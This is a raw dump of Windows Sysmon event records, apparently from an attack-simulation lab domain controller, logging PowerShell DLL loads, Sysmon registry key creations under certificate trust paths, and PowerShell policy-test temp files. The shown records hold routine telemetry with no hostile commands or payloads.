12:18:43.836{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\85691b702c65c1297dd5294e1969beb4\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=05D15B1B56CA953CA35E6738883CB557,SHA256=68DA3DBA92F2FFE1AAD95B46E65186EE16FC700AF01738E838732EF0B94F1A98false-Unavailable 17141700x800000000000000057347301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:43.980{8B6011A9-5BA2-618E-51F3-04000000F101}7356\PSHost.132811931224397609.7356.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x800000000000000057347300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.972{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057347286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.824{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 12241200x800000000000000057347285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.971{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.968{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.964{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.964{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.822{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0fbbab68671be0c0f3a6297e7ca803d\System.Management.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Management.dllMD5=DBB27AB7CAB61053088108EADD3FF3A1,SHA256=703DD09A5B05E85DAC24B667BC3245FBD5E5656E5310E2C12D07854509D5B197false-Unavailable 12241200x800000000000000057347270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.947{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.946{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.809{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4530 (rs1_release.210705-0736)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=A579FD92E60D1CE05E20BF7569D579E8,SHA256=CD9DF3851153E3770E343CE224E6F969B9C5A466BF8C1036242DCBB5CE0F7986trueMicrosoft WindowsValid 12241200x800000000000000057347254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.945{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.930{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.930{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.807{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.4467 (rs1_release.210604-1844)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=96BBBC9AD606CF5EBAF525E3AB1C69A5,SHA256=32F0EA9185A6E1DE26E3276BAAB0FB5ED72940D34FE5FFDF5331D91E42794124trueMicrosoft WindowsValid 12241200x800000000000000057347227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.929{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.926{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057347216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.804{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 11241100x800000000000000057347215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.882{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057347214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.881{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E09411DBC7F2E7BD85C032CCCDC67870,SHA256=3996B52FDF5EC10ADC10C5A6C259ACEFF9B560B7C9D95C18032FEB1CEFA17D8Efalsetrue 23542300x800000000000000057347213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.880{8B6011A9-5BA2-618E-51F3-04000000F101}7356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4kerl5rg.hdf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsetrue 23542300x800000000000000057347212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.879{8B6011A9-5BA2-618E-51F3-04000000F101}7356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nz34x0fj.oc1.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsetrue 734700x800000000000000057347211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.872{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft 